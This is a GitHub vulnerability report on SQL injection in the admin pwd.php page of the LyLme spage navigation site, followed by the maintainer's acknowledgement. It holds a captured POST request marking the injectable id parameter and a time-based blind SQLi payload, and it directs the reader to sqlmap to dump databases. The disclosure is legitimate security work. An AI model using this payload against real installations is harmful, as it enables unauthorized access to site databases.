### ISSUE TITLE
There is an SQL injection vulnerability in the backend encryption group management of the 60 navigation page

### ISSUE THREAD

**Issue by pengbaidong** [LyLme/lylme_spage#78]
There is a code statement in code pwd.php that directly concatenates the database

![image](https://github.com/LyLme/lylme_spage/assets/135697575/e95b3504-aef9-4761-96d7-22cb00f32c65)

Accessing the directory after normal login to the page
/admin/pwd.php

Create a new encryption first, as the concatenation statement is modifying the encryption group

![image](https://github.com/LyLme/lylme_spage/assets/135697575/11e01df4-c0da-4b30-a784-9cca96e920ef)

After completion, click on edit

![image](https://github.com/LyLme/lylme_spage/assets/135697575/66eaea8c-0420-4744-b312-db6f3b19f946)

Capture this data packet when clicking on modify

![image](https://github.com/LyLme/lylme_spage/assets/135697575/5bdccaa3-0c7e-4af3-97fb-1a4aa85b9b9d)

The data packet is like this, with the injection point at ID, throw it onto the sqlmap and run it

`POST /60/admin/pwd.php?set=edit_submit&id=1* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/60/admin/pwd.php?set=edit&id=1
Cookie: admin_token=d51ebJtKSdIsUZwzkIebniRKGyn9kcZCOcGZWcIb1A0stHL7tXHH4DXQXgX4PXSAgucVZ991e9eoCg4iY8M34HGk1A; gpadminpassport=cm9vdHw3ZDIyOGY5N2I3ZWI3YTI5ZGM2ZmI4MzE1NDUxM2E0Nw==; csrftoken=SYXOJTVQ8rjRO3yc71xrm0fF1OA7ctHU; SID_1=e583919; USER_NAME_COOKIE=admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

pwd_name=admin&pwd_key=123456&pwd_ps=123456`

payload:
1+AND+(SELECT+7873+FROM+(SELECT(SLEEP(5)))VaEy)

Annotate all databases

![image](https://github.com/LyLme/lylme_spage/assets/135697575/4083f034-72b1-43b4-ad0a-da839e4e5f02)

**Comment by LyLme** [comment]
收到，之前对于后台目录并没有进行处理，后续会修复
